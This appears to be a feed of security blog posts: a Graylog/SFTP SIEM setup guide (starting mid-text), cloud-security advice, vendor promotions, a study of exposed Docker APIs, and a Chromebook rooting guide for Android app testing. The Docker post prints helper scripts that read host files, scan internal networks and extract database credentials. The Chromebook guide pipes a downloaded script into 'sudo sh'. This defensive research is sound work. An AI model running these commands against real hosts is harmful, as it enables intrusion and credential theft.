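root_password_sha2 = hashlib.sha256(b"password").hexdigest()
print(len(password_secret), root_password_sha2[:8])  # 96 5e884898
```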

Now you can open the Graylog configuration file:

sudo nano /etc/graylog/server/server.conf

And replace password_secret and root_password_sha2 with the values you created above.

The configuration file should look as below (replace with your own generated password):

Now replace the following entries with the AWS CNAME that was given when your EC2 instance was created. Note that, depending on your setup, you can replace the alias below with your internal IP.

16. Optional: Configure HTTPS for the Graylog web interface

Although not mandatory, it is recommended that you configure https to your Graylog server.

Please find the steps to setup https in the following link:

17. Start the Graylog service and enable it on system startup

Run the following commands to restart Graylog and enforce it on the server startup:

sudo systemctl daemon-reload
sudo systemctl enable graylog-server.service
sudo systemctl start graylog-server.service

Now we can check that Graylog has properly started:

sudo systemctl status graylog-server.service

18. Login to the Graylog console

You should now be able to login to the console.

If the page is not loading at all, check if you have properly configured the security group of your instance and that port 9000 is open.

You can login with username ‘admin’ and the password you set as your secret password.

Step 4: Configure SFTP on your server and Imperva Cloud WAF SFTP push

19. Create a new user and its group

Let’s create a new user that Incapsula will use to send logs.

sudo adduser incapsula

incapsula is the user name created in this example. You can replace it to the name of your choice. You will be prompted to choose a password.

Let’s create a new group:

sudo groupadd incapsulagroup

And associate the incapsula user to this group

sudo usermod -a -G incapsulagroup incapsula  

20. Let’s create a directory where the logs will be sent to

In this example, we will send all logs to /home/incapsula/logs

cd /home

sudo mkdir incapsula

cd incapsula

sudo mkdir logs

21. Now let’s set strict permission restrictions on that folder

For security purposes, we want to restrict access of this user strictly to the folder where the logs will be sent. The home and incapsula folders can be owned by root while logs will be owned by our newly created user.

sudo chmod 755 /home/incapsula

sudo chown root:root /home/incapsula

Now let’s assign our new user (incapsula in our example) as the owner of the logs directory:

sudo chown -R incapsula:incapsulagroup /home/incapsula/logs

The folder is now owned by incapsula and belongs to incapsulagroup.

And you can see that the incapsula folder is restricted to root, so the newly created incapsula user can only access the /home/incapsula/logs folder, to send its logs.

22. Now let’s configure open-ssh SFTP server and set the appropriate security restrictions.

sudo nano /etc/ssh/sshd_config

Comment out this section:

#Subsystem sftp /usr/lib/openssh/sftp-server

And add this line right below:

subsystem sftp internal-sftp

Change the authentication to allow password authentication so Incapsula can send logs using username / password authentication:

PasswordAuthentication yes

And add the following lines at the bottom of the document:

match group incapsulagroup

chrootDirectory /home/incapsula

X11Forwarding no

AllowTcpForwarding no
ForceCommand internal-sftp
PasswordAuthentication yes

Save the file and exit.

Let’s now restart the SSH server:

sudo service sshd restart

23. Now let’s check that we can send files using SFTP

For that, let’s use FileZilla and try to upload a file. If everything worked properly, you should be able to:

  • Connect successfully
  • See the logs folder, but be unable to navigate outside it
  • Copy a file to the remote server

Step 5: Push the logs from Imperva Incapsula to the Graylog SFTP folder

24. Configure the Logs in Imperva Cloud WAF SIEM logs tab

  • Log into your account.
  • On the sidebar, click Logs > Log Setup
    • Make sure you have SIEM logs license enabled.
  • Select the SFTP option
  • In the host section enter your public facing AWS hostname. Note that your security group should be open to Incapsula IPs as described in the Security Group section earlier.
  • Update the path to your logs folder
  • For the first testing, let’s disable encryption and compression.
  • Select CEF as log format
  • Click Save

See below an example of the settings. Click Test Connection and ensure it is successful. Click Save.

25. Make sure the logs are enabled for the relevant sites as below

You can select either security logs or all access logs on a site-per-site basis.

Selecting All Logs will retrieve all access logs, while Security Logs will push only logs where security events were raised.

  • Note that selecting All Logs will have a significant impact on the volume of logs.

You can find more details on the various settings of the SIEM logs integration in Imperva documentation in this link.

26. Verify that logs are getting pushed from Incapsula servers to your SFTP folder


The first logs might take some time to reach your server, depending on the volume of traffic on the site, in particular for a site with little traffic. Generate some traffic and events.

27. Enhance performance and security

To improve the security and performance of your SIEM integration project, you can consider enforcing https in Graylog. You can find a guide to configure https on Graylog here.

 That’s it! In my next blogs, we will describe how to start collecting and parsing Imperva and Incapsula logs using Graylog and how to create your first dashboard.

If you have suggestions for improvements or updates in any of the steps, please share with the community in the comments below.

The post How to Deploy a Graylog SIEM Server in AWS and Integrate with Imperva Cloud WAF appeared first on Blog.

Security Considerations for Whatever Cloud Service Model You Adopt

Companies recognize the strategic importance of adopting a cloud service model to transform their operations, but there still needs to be a focus on mitigating potential information risks with appropriate cloud security considerations, controls and requirements without compromising functionality, ease of use or the pace of adoption. We all worry about security in our business and personal lives, so it’s naturally a persistent concern when adopting cloud-based services — and understandably so. However, research suggests that cloud services are now a mainstream way of delivering IT requirements for many companies today and will continue to grow in spite of any unease about security.

According to Gartner, 28 percent of spending within key enterprise IT markets will shift to the cloud by 2022, which is up from 19 percent in 2018. Meanwhile, Forrester reported that cloud platforms and applications now drive the full spectrum of end-to-end business technology transformations in leading enterprises, from the key systems powering the back office to mobile apps delivering new customer experiences. More enterprises are using multiple cloud services each year, including software-as-a-service (SaaS) business apps and cloud platforms such as infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS), both on-premises and from public service providers.

What Is Your Cloud Security Readiness Posture?

The state of security readiness for cloud service adoption varies between companies, but many still lack the oversight and decision-making processes necessary for such a migration. Managing and overseeing a cloud vendor relationship demands stronger alignment and governance processes. This represents a shift in responsibilities, so companies need to adequately staff, manage and maintain the appropriate level of oversight and control over the cloud service. As a result, cloud services require a security governance and management model, one best embodied in a cloud vendor risk management program.

A cloud vendor risk management program requires careful consideration and implementation, but not a complete overhaul of your company’s entire cybersecurity program. The activities in the cloud vendor risk management program are intended to assist companies in approaching security in a consistent manner, regardless of how varied or unique the cloud service may be. The use of standard methods helps ensure there is reliable information on which to base decisions and actions. It also reinforces the ability to proactively evaluate and mitigate the risks cloud vendors introduce to the business. Finally, standard cloud vendor risk management methods can help distinguish between different types of risks and manage them appropriately.

Overlooked Security Considerations for Your Cloud Service Model

A cloud vendor risk management program provides a tailored set of security considerations, controls and requirements within a cloud computing environment through a phased life cycle approach. Determining cloud security considerations, controls and requirements is an ongoing analytical activity to evaluate the cloud service models and potential cloud vendors that can satisfy existing or emerging business needs.

All cloud security controls and requirements possess a certain level of importance based on risk, and most are applicable regardless of the cloud service. However, some elements are overlooked more often than others, and companies should pay particular attention to the following considerations to protect their cloud service model and the data therein.

Application Security

  • Application exposure: Consider the cloud vendor application’s overall attack surface. In a SaaS cloud environment, the applications offered by the cloud vendor often have broader exposure, which increases the attack surface. Additionally, those applications often still need to integrate back to other noncloud applications within the boundaries of your company or the cloud vendor enterprise.
  • Application mapping: Ensure that applications are aligned with the capabilities provided by cloud vendors to avoid the introduction of any undesirable features or vulnerabilities.
  • Application design: Pay close attention to the design and requirements of an application candidate and request a test period from the cloud vendor to rule out any possible issues. Require continuous communication and notification of major changes to ensure that compatibility testing is included in the change plans. SaaS cloud vendors will typically introduce additional features to improve the resilience of their software, such as security testing or strict versioning. Cloud vendors can also inform your company about the exact state of its business applications, such as specific software logging and monitoring, given their dedicated attention to managing reputation risk and reliance on providing secure software services and capabilities.
  • Browser vulnerabilities: Harden web browsers and browser clients. Applications offered by SaaS cloud vendors are accessible via secure communication through a web browser, which is a common target for malware and attacks.
  • Service-oriented architecture (SOA): Conduct ongoing assessments to continuously identify any application vulnerabilities, because the SOA libraries are maintained by the cloud vendor and not completely visible to your company. By using the vendor-provided SOA library, you can develop and test applications more quickly because SOA provides a common framework for application development.

Data Governance

  • Data ownership: Clearly define data ownership so the cloud vendor cannot refuse access to data or demand fees to return the data once the service contracts are terminated. SaaS cloud vendors will provide the applications and your company will provide the data.
  • Data disposal: Consider the options for safe disposal or destruction of any previous backups. Proper disposal of data is imperative to prevent unauthorized disclosure. Replace, recycle or upgrade disks with proper sanitization so that the information no longer remains within storage and cannot be retrieved. Ensure that the cloud vendor takes appropriate measures to prevent information assets from being sent without approval to countries where the data can be disclosed legally.
  • Data disposal upon contract termination: Implement processes to erase, sanitize and/or dispose of data migrated into the cloud vendor’s application prior to a contract termination. Ensure the details of applications are not disclosed without your company’s authorization.
  • Data encryption transmission requirements: Provide encryption of confidential data communicated between a user’s browser and a web-based application using secure protocols. Implement encryption of confidential data transmitted between an application server and a database to prevent unauthorized interception. Such encryption capabilities are generally provided as part of, or an option to, the database server software. You can achieve encryption of confidential file transfers through protocols such as Secure FTP (SFTP) or by encrypting the data prior to transmission.
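As a concrete sketch of the bullet above on encrypting data prior to transmission, OpenSSL can encrypt a file before it ever reaches a transfer channel. The file names and demo key below are placeholders, and `-pbkdf2` assumes OpenSSL 1.1.1 or later:

```shell
# Demo data and key; in practice the key comes from key management, not a shell variable
TRANSFER_KEY=demo-secret
printf 'id,name\n1,alice\n' > customer-report.csv

# Encrypt before handing the file to SFTP or any other channel
openssl enc -aes-256-cbc -pbkdf2 -salt \
  -in customer-report.csv -out customer-report.csv.enc \
  -pass pass:"$TRANSFER_KEY"

# The receiving side reverses the operation with the shared key
openssl enc -d -aes-256-cbc -pbkdf2 \
  -in customer-report.csv.enc -out customer-report.decrypted.csv \
  -pass pass:"$TRANSFER_KEY"
```

Password-based encryption like this is only a sketch; a production setup would layer it on top of an already-encrypted channel such as SFTP.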

Contract Management

  • Transborder legal requirements: Validate whether government entities in the hosting country require access to your company’s information, with or without proper notification. Implement necessary compliance controls and do not violate regulations in other countries when storing or transmitting data within the cloud vendor’s infrastructure. Different countries have different legal requirements, especially concerning personally identifiable information (PII).
  • Multitenancy: Segment and protect all resources allocated to a particular tenant to avoid disclosure of information to other tenants. For example, when a customer no longer needs allocated storage, it may be freely reallocated to another customer. In this case, wipe data thoroughly.
  • Network management: Determine network management roles and responsibilities with the cloud vendor. Within a SaaS implementation, the cloud vendor is entirely responsible for the network. In other models, the responsibility of the network is generally shared, but there will be exceptions.
  • Reliability: Ensure the cloud vendor has service-level agreements that specify the amount of allowable downtime and the time it will take to restore service in the event of an unexpected disruption.
  • Exit strategy: Develop an exit strategy for the eventual transition away from the cloud vendor considering tools, procedures and other offerings to securely facilitate data or service portability from the cloud vendor to another or bring services back in-house.

IT Asset Governance

  • Patch management: Determine the patch management processes with the cloud vendor and ensure there is ongoing awareness and reporting. Cloud vendors can introduce patches in their applications quickly without the approval or knowledge of your company because it can take a long time for a cloud vendor to get formal approval from every customer. This can result in your company having little control or insight regarding the patch management process and lead to unexpected side effects. Ensure that the cloud vendor hypervisor manager allows the necessary patches to be applied across the infrastructure in a short time, reducing the time available for a new vulnerability to be exploited.
  • Virtual machine security maintenance: Partner with cloud vendors that allow your company to create virtual machines (VM) in various states such as active, running, suspended and off. Although cloud vendors could be involved, the maintenance of security updates may be the responsibility of your company. Assess all inactive VMs and apply security patches to reduce the potential for out-of-date VMs to become compromised when activated.

Accelerate Your Cloud Transformation

Adopting cloud services can be a key steppingstone toward achieving your business objectives. Many companies have gained substantial value from cloud services, but there is still work to be done. Even successful companies often have cloud security gaps, including issues related to cloud security governance and management. Although it may not be easy, it’s critical to perform due diligence to address any gaps through a cloud vendor risk management program.

Cloud service security levels will vary, and security concerns will always be a part of any company’s transition to the cloud. But implementing a cloud vendor risk management program can certainly put your company in a better position to address these concerns. The bottom line is that security is no longer an acceptable reason for refusing to adopt cloud services, and the days when your business can keep up without them are officially over.

The post Security Considerations for Whatever Cloud Service Model You Adopt appeared first on Security Intelligence.

Severe Flaw Disclosed In StackStorm DevOps Automation Software

A security researcher has discovered a severe vulnerability in StackStorm, the popular open-source event-driven platform, that could allow remote attackers to trick developers into unknowingly executing arbitrary commands on targeted services. StackStorm, aka "IFTTT for Ops," is a powerful event-driven automation tool for integration and automation across services and tools.

Imperva Wins Awards for Best Database Security, Coolest Cloud Security Vendor

SC Magazine has long been one of the most respected names in cybersecurity journalism, and one that has written about Imperva’s security research and solutions many times.

So we’re proud to announce that we’ve won the 2019 SC Award for Best Database Security solution at SC’s awards ceremony on March 5th in San Francisco. Held near the RSA Conference 2019, the SC Awards also honored Imperva as a Finalist for Best Web Application Security.

Imperva’s been on a roll awards-wise. Just two weeks ago, CRN magazine named Imperva one of its Top 20 Coolest Cloud Vendors for security. That same month, CRN profiled two of our executives, VP Jim Ritchings and Senior Director Kirt Jorgenson, in its list of 2019 Channel Chiefs. Meanwhile, our AAP solution, which automatically safeguards applications from new and unknown threats, was named a Silver Winner in the Cybersecurity Excellence Awards 2019.

And going back to the end of last year, Imperva Attack Analytics was named a finalist for best security solution in CRN’s Tech Innovator Award, while our Web Application Firewall (WAF) was named one of the best in 2018 by enterprise customers surveyed by Gartner Peer Insights.

See a full list of Imperva honors here.

Why do our capabilities, especially in data security and cloud, win recognition from customers and experts alike? Because Imperva not only secures your data from theft, we also simplify compliance with vital regulations such as GDPR, SOX, PCI, HIPAA, and more. For instance, our Discovery and Assessment capability automatically finds unknown databases, classifies sensitive data, and detects database vulnerabilities. Data Activity Monitoring and Protection reliably monitors and protects databases with little or no impact on performance or availability. We standardize audit across all your databases, enabling organizations to automate compliance whether your databases are on-premises or in the cloud.

Our Data Risk Analytics capability uses machine learning and user data behavior analytics to distill millions of alerts to pinpoint suspicious activity and provide actionable insights in plain language. Our efficient data collection and processing means we require less than half the number of appliances as our primary competitor. And it helped one customer, a computer manufacturer, lower their cost of ownership by 70%. Finally, our Data Masking feature reduces risk in non-production environments by replacing large volumes of sensitive data easily with realistic fictional data.

Through our FlexProtect licensing plans, your enterprise has access to our suite of data security and application security capabilities, which you can quickly deploy wherever your applications and data are located — on-premises, in the cloud, in multiple clouds, or all of the above. And as customers continue moving their applications to the cloud, they can be confident that Imperva will migrate our security there, too.

With FlexProtect, there’s no risk of complicated, inflexible security licenses failing to cover your hybrid data infrastructure or slowing down your digital transformation.

We are at the RSA Conference all week at Booth 527 in the South Expo. Come down and meet our experts to learn more about our data and application security solutions and how our new FlexProtect plans can be as agile as your organization needs to be. Or follow up with us at

The post Imperva Wins Awards for Best Database Security, Coolest Cloud Security Vendor appeared first on Blog.

Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners

Docker is a technology that allows you to perform operating system level virtualization. An incredible number of companies and production hosts are running Docker to develop, deploy and run applications inside containers.

You can interact with Docker via the terminal and also via its remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, controlling and querying the state of your containers, and more. With this great power comes great risk — if control falls into the wrong hands, your entire network can be in danger.

In February, a new vulnerability (CVE-2019-5736) was disclosed that allows an attacker to gain root access on the host from within a Docker container. The combination of this new vulnerability and an exposed Docker remote API can lead to a fully compromised host.

According to Imperva research, exposed Docker remote APIs have already been taken advantage of by hundreds of attackers, many of whom use the compromised hosts to mine a lesser-known, albeit rising, cryptocurrency for their financial benefit.

In this post you will learn about:

  • Publicly exposed Docker hosts we found
  • The risk they can put organizations in
  • Protection methods

Publicly Accessible Docker Hosts

The Docker remote API listens on ports 2375 (unencrypted) and 2376 (TLS). By default, the remote API is only accessible from the loopback interface (“localhost”, 127.0.0.1) and should not be available from external sources. However, as with other cases — for example, publicly accessible Redis servers such as RedisWannaMine — organizations sometimes misconfigure their services, allowing easy access to their sensitive data.

We used the Shodan search engine to find open ports running Docker.

We found 3,822 Docker hosts with the remote API exposed publicly.

We wanted to see how many of these IPs were really exposed. In our research, we tried to connect to each IP on port 2375 and list the Docker images. Of the 3,822 IPs, we found that approximately 400 were accessible.
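A probe like the one we ran can be sketched with curl against the Docker Engine API’s documented /_ping endpoint, which an open daemon answers with “OK”. The helper name and the TEST-NET example address are our own illustrative choices:

```shell
# check_docker_api HOST [PORT]: prints "OK" if an unauthenticated Docker
# daemon answers the documented /_ping endpoint on the given host and port
check_docker_api() {
  curl -s --max-time 3 "http://$1:${2:-2375}/_ping"
}

# e.g. check_docker_api 203.0.113.10
```

An empty result or timeout means the port did not answer; any host that prints OK is accepting unauthenticated API calls.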

Red indicates Docker images of crypto miners, while green shows production environments and legitimate services  

We found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction.  

Other hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.

Hacking with the Docker Remote API

The possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. They can also be used to:

  • Launch more attacks with masked IPs
  • Create a botnet
  • Host services for phishing campaigns
  • Steal credentials and data
  • Pivot attacks to the internal network

Here are some script examples for the above attacks.

1. Access files on the Docker host and mounted volumes

By starting a new container and mounting a folder from the host into it, we gained access to other files on the Docker host.

It is also possible to access data outside of the host by looking on container mounts. Using the Docker inspect command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also change the data.
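The container-mount trick from this section could be sketched as follows, assuming an API exposed on the hypothetical TEST-NET address 203.0.113.10. The helper name, image and port are our illustrative choices; this requires the docker CLI:

```shell
# read_host_file HOST PATH: spawn a throwaway container on the remote host
# with the host's root filesystem mounted, then read an arbitrary file
# through the mount. Illustrative only; needs the docker CLI installed.
read_host_file() {
  docker -H "tcp://$1:2375" run --rm -v /:/hostfs alpine cat "/hostfs$2"
}

# e.g. read_host_file 203.0.113.10 /etc/passwd
```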

2. Scan the internal network

When a container is created on one of the predefined Docker networks, “bridge” or “host,” attackers can use it to reach other machines on the internal network that the Docker host can access. We used nmap to scan the host’s network for services. We did not need to install it; we simply used a ready-made image from the Docker Hub:

It is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our Redis WannaMine post.
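The scan described above can be sketched like this; the helper name and the public nmap image are illustrative choices, not necessarily what the attackers we observed used:

```shell
# nmap_via_docker HOST TARGET: run an internal scan from a container attached
# to the host network, using a public nmap image so nothing needs installing.
# Illustrative only; needs the docker CLI installed.
nmap_via_docker() {
  docker -H "tcp://$1:2375" run --rm --network host \
    instrumentisto/nmap -sT -p 1-1024 "$2"
}

# e.g. nmap_via_docker 203.0.113.10 10.0.0.0/24
```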

3. Credentials leakage

It is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories.

We found three simple ways to detect credentials using the Docker remote API:

Docker inspect command

“env” command on a container

Docker inspect doesn’t return all environment variables. For example, it doesn’t return those passed to docker run using the --env-file argument. Running the “env” command on a container will return the entire list:

Credentials files on the host

Another option is mounting known credentials directories inside the host. For example, AWS credentials have a default location for CLI and other libraries and you can simply start a container with a mount to the known directory and access a credentials file like “~/.aws/credentials”.

4. Data Leakage

Here is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:
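Concretely, such a lookup might be sketched like this; the helper name, the environment-variable name and the query are illustrative:

```shell
# dump_mysql HOST CONTAINER: read a password from a MySQL container's
# environment, then use it to run a query against the database.
# Illustrative only; needs the docker CLI installed.
dump_mysql() {
  host=$1; container=$2
  pass=$(docker -H "tcp://$host:2375" exec "$container" env |
    sed -n 's/^MYSQL_ROOT_PASSWORD=//p')
  docker -H "tcp://$host:2375" exec "$container" mysql -uroot -p"$pass" \
    -e 'SHOW DATABASES;'
}

# e.g. dump_mysql 203.0.113.10 prod-mysql
```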

Wrapping Up

In this post, we saw how dangerous exposing the Docker API publicly can be.

Exposing Docker ports can be useful and may be required by third-party apps like Portainer, a management UI for Docker.

However, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on Securing Docker remote daemon.
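As one illustration of such a control, following Docker’s guidance, the daemon can be configured to require TLS client certificates on the remote API. The certificate paths below are placeholders for files you issue from your own CA (a sketch of /etc/docker/daemon.json):

```json
{
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem",
  "hosts": ["tcp://0.0.0.0:2376", "unix:///var/run/docker.sock"]
}
```

With this in place, only clients presenting a certificate signed by your CA can reach the API on port 2376.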

Imperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:

  • What do I have?
  • Is it secure?

The tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please contact Imperva sales.

We also saw how credentials stored as environment variables can be retrieved. This practice is common and convenient, but far from secure. Instead of using environment variables, it is possible to read credentials at runtime (depending on your environment). In AWS, you can use roles and KMS. In other environments, you can use third-party tools like Vault or credstash.

The post Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners appeared first on Blog.

Android App Testing on Chromebooks

Part of testing Android mobile applications is proxying traffic, just like other web applications.  However, since Android Nougat (back in 2016), user or admin-added CAs are no longer trusted for secure connections.  Unless the application was written to trust these CAs, we have no way of viewing the https traffic being passed between the client and servers.  Your only two options are to either buy a device running an older version of Android OS or to root your existing device.  Rooting a device can cause all sorts of issues and depending on your system may require a bit of effort and installation of other tools and utilities.  This is probably overkill just for adding a certificate.  Luckily, there is another option: Chromebooks. 

Google has been promoting the ability to install apps from the Google Play store since the middle of 2016.  Now, to proxy the traffic from an Android application, you will most likely still need to root the Android subsystem.  This is not always the case but, even if you do, rooting (and un-rooting) a Chromebook is remarkably easy.  Not to mention, you get a real keyboard and large screen!  However, before you run out and buy a Chromebook to use for testing, you should be aware of a few caveats:

  • Not all Chromebooks can run Android apps
  • Not all Android apps install on a Chromebook
  • Rooting the Android subsystem will wipe all existing user data on the Chromebook
  • Using Developer Mode will stop the Chromebook from installing most updates and prevent some applications from installing

Let’s walk through the process of getting the Burp CA cert added as a System CA on a Chromebook’s Android subsystem.  The whole process takes about an hour (depending on the speed of your Chromebook).  Before we start making any changes, be sure to copy any data you want to keep off of the Chromebook.  This process will wipe the device.

Enable Developer Mode
The method to get into Developer Mode may be slightly different from what I list, depending on the Chromebook you are using.  I’m using an Asus R11. Please refer to Step 3 on the “Recover Your Chromebook” web page for methods for other devices.

  1. Press ESC, Refresh, and the power button at the same time to load Recovery Mode.
  2. When the Recovery Mode screen loads, press Ctrl+D and then Enter
  3. The system will reboot and you will see the OS Verification warning screen.  Press Ctrl+D again.  From this point forward, until you revert back to a verified OS, you will have to press Ctrl+D at every boot up.
  4. Wait for about 15 minutes while the Chromebook prepares the Developer mode

Enable Debugging Features
This does not need to be done, but I highly recommend it so you can get a full bash terminal session through crosh (the Chrome OS shell).  This must be done on the first boot up after the Chromebook finishes installing Developer mode.

The Chromebook will reboot and then prompt you for a root password

Set sudo Password for the Dev Console in crosh
At this point, sign in to the Chromebook as normal.  Let the system create your profile and load the Google Play store.  Depending on your Google and Chrome settings, you may need to wait a bit as applications are automatically installed.

  1. Press Ctrl+Alt+F2 (or the Forward -> button) to get to the Developer Console.
  2. Login with root and the password you previously set up
  3. Type chromeos-setdevpasswd and press Enter.  You will be prompted for the sudo password.
  4. Type logout and press Enter
  5. Press Ctrl+Alt+F1 (or the Back <- button) to go back to the main screen

Disable OS Checks and Hardening
Before we can actually root the Chromebook, we need to disable some security settings.

  1. Press Ctrl+Alt+t to open the crosh window
  2. Type shell and press Enter to load a full shell
  3. Type sudo crossystem dev_boot_signed_only=0 and press Enter
  4. Type sudo /usr/libexec/debugd/helpers/dev_features_rootfs_verification and press Enter
  5. Reboot the Chromebook
    1. sudo reboot
  6. Once the system comes back, open another terminal window (Ctrl+Alt+t >> shell)
  7. Run the following command:  sudo /usr/share/vboot/bin/make_dev_ssd.sh --remove_rootfs_verification --partitions $(( $(rootdev -s | sed -r 's/.*(.)$/\1/') - 1))
  8. Reboot the Chromebook (sudo reboot)

“Root” the Android Subsystem
Up until this point, we’ve just been prepping the system.  Running the following command will copy my modified script from GitHub and create an editable partition we can add items to (such as new CA certs).

curl -Ls | sudo sh

This script was modified from work that nolirium created.  My version does not add the extra tools (BusyBox, etc.) included in the original.

Once the script finishes (as shown above), reboot once again.  Once the Chromebook comes back online, we can install the Burp cert.

Configuring Android subsystem to use the Burp Certificate
We’re almost done but this portion takes multiple steps.  This is mainly because the Android subsystem wants the cert to be in a different format and named a specific way.

  1. Download the certificate from Burp and copy to the Chromebook.  If you copy the cert to the Downloads directory on the Chromebook, the path (in a shell window) is /home/user/<randomstring>/Downloads.  All of my following examples assume you downloaded the certificate to the Downloads directory
  2. Convert the cert to one used by Android (this can be done on linux system or on the Chromebook itself in a terminal window):
                openssl x509 -inform der -in cacert.der -out burp.pem
  3. Import the burp.pem file as an Authority in Chrome.  This is done in the GUI.
    1. Open Settings
    2. Expand “Advanced”
    3. Click on Manage Certificates
    4. Select the Authorities tab
    5. Click on Import.
    6. Find the burp.pem file and import it.
      1. Select all 3 check boxes for the Trust settings and click on OK
    7. Validate that the org-PortSwigger CA is now listed (as shown below)
  4. The CA should now also be listed as an Android User certificate
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials
    5. Click on the User tab
    6. Validate the certificate is there as well. 
    7. If the cert is not listed, you can import the certificate by following the next few steps:
      • Go back to the Security menu
      • Select Install from SD card
      • Select Downloads in the Open from window
      • Select the burp.pem file and give it a name
      • The cert should now be listed as a Trusted User Credential
  5. Find the name of the certificate that was added to Android
    1. Open a shell (Ctrl+Alt+t and then shell) and run:
        sudo ls /opt/google/containers/android/rootfs/android-data/data/misc/user/0/cacerts-added
    2. Take note of the file name.  In my case, it is 9a5ba575.0.  We will be using this name for the new System CA certificate file we are about to create.
  6. Create the properly formatted certificate file. (This can be done on a linux server or on the Chromebook itself.  Where ever you created the burp.pem file):
     cat burp.pem > 9a5ba575.0
  7. Append the cert text to the file:
      openssl x509 -inform PEM -text -noout -in burp.pem >> 9a5ba575.0
  8. Copy our new cert file to the Android system:
      cp /home/user/<randomstring>/Downloads/9a5ba575.0 /opt/google/containers/android/rootfs/root/system/etc/security/cacerts/
  9. Reboot
  10. Validate that the PortSwigger CA is now listed in the Trusted Systems
    1. Open Settings
    2. Click on the Google Play Store settings -> Manage Android preferences
    3. Click on Security
    4. Click on Trusted credentials
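The file name used in steps 5-8 is not arbitrary: Android names each system CA file after the certificate’s old-style OpenSSL subject hash, with a “.0” suffix. You can compute the expected name directly, shown here with a throwaway self-signed certificate (substitute the burp.pem from step 2):

```shell
# Throwaway cert purely for illustration; use your real burp.pem instead
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -subj "/CN=Demo CA" -keyout demo-key.pem -out demo-ca.pem 2>/dev/null

# Android system CA file name = old-style subject hash + ".0"
hash=$(openssl x509 -subject_hash_old -in demo-ca.pem -noout)
echo "${hash}.0"
```

The printed name should match the file you found under cacerts-added in step 5.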

You should now be able to proxy your traffic through Burp and intercept https traffic!  Often, when I do this, I send the data to my other laptop.  This is so I can save all of the proxy information (including required exclusions for android / google) to a dedicated wifi connection.  This is the current list of exclusions, but it is always growing:

  • alt*.gstatic.com

Returning to Normal
Reverting back to the normal state is very easy.  First off, copy off the custom cert files (as they will be named the same thing if you choose to do this process again later).  Then perform the following steps:

  1. Run this command to put back the default Android Image:
      sudo mv /opt/google/containers/android/system.raw.img.bk /opt/google/containers/android/system.raw.img
  2. Reboot the Chromebook
  3. When the system boots to the OS Verification screen, instead of pressing Ctrl+D, press the spacebar.  This will wipe the Chromebook and put it back to the default configuration.

If you run into extreme issues, you should be able to powerwash the device.  At worst, you will have to reinstall the OS, which takes about an hour but is much easier on a Chromebook than on other Android systems.  The full process to recover a Chromebook can be found here.

Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise.

Is your enterprise in the midst of a digital transformation? Of course it is. Doing business in today’s global marketplace is more competitive than ever. Automating your business processes and infusing them with always-on, real-time applications and other cutting-edge technology is key to keeping your customers happy, attracting and retaining good workers, transacting with your partners, and growing your business.

A transformation this sweeping doesn’t happen overnight, though. Mission-critical applications and processes can’t be swapped for new ones without risk to your bottom line. While enterprises are moving to hosted applications or virtualized software hosted on Infrastructure-as-a-Service (IaaS) platforms such as AWS or Microsoft Azure, the reality is that it will take many years for them to become all cloud — if ever.

In other words, many, if not most, enterprises have a hybrid IT infrastructure. And that’s not going to change for many years.

In the meantime, you need security strong enough to protect your business and agile enough to cover your transforming infrastructure. That’s why Imperva has introduced a simpler way for organizations to deploy our family of security products and services, which we call FlexProtect. FlexProtect comes in three different plans: FlexProtect Pro, FlexProtect Plus, and FlexProtect Premier.

With the FlexProtect Plus and Premier plans, our analyst-recognized application and data security solutions protect your applications and data even as you migrate them from on-premises data centers to multiple cloud providers. Don’t let complicated, inflexible security licenses slow down your cloud migration. FlexProtect provides simple and predictable licensing that covers your entire IT infrastructure, even if you use multiple clouds for IaaS, and even as you move workloads between on-premises and clouds. With our powerful security analytics solutions available in all FlexProtect plans, you also have the visibility and control you need to help you manage your security wherever your assets are.

Imperva also offers a third option, FlexProtect Pro. This brings together five powerful SaaS-based Application Security capabilities to protect your edge from attack: Cloud WAF, Bot Protection, IP Reputation Intelligence, our Content Delivery Network (CDN) as well as our powerful Attack Analytics solution, which turns events into insights you can act on. FlexProtect Pro gives businesses simple application security delivered completely as a service.

Imperva is in the midst of its own transformation — learn more about the New Imperva here. That gives us keen insight into the challenges with which our customers are grappling. And that’s why we developed FlexProtect licensing, in order to better defend your business and its growth, wherever you are on your digital transformation journey. You’ll never have to choose between innovating for your customers and protecting what matters.

To learn more about FlexProtect, meet us at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and hear directly from Imperva experts. You can also see a demo of our latest products in the areas of cloud app and data security and data risk analytics.

Imperva will also be at the AWS booth (1227 in the South Expo hall). There, on Tuesday, March 5th from 3:30 – 4:00 pm, you'll be able to hear how one of our cloud customers, a U.S.-based non-profit with nearly 40 million members, uses Imperva Autonomous Application Protection (AAP) to detect and mitigate potential application attacks. You can also see a demo of how our solutions work in cloud environments on Tuesday, March 5th, 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm.

Finally — I will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” during RSA. It will be broadcast live at 9:30 am on March 6th and feature a Q&A discussion with several cybersecurity executives as they discuss the possibility of a cyber battle between AI systems, which some experts predict might be on the horizon in the next three to five years. Register and watch the live feed or recording for free!

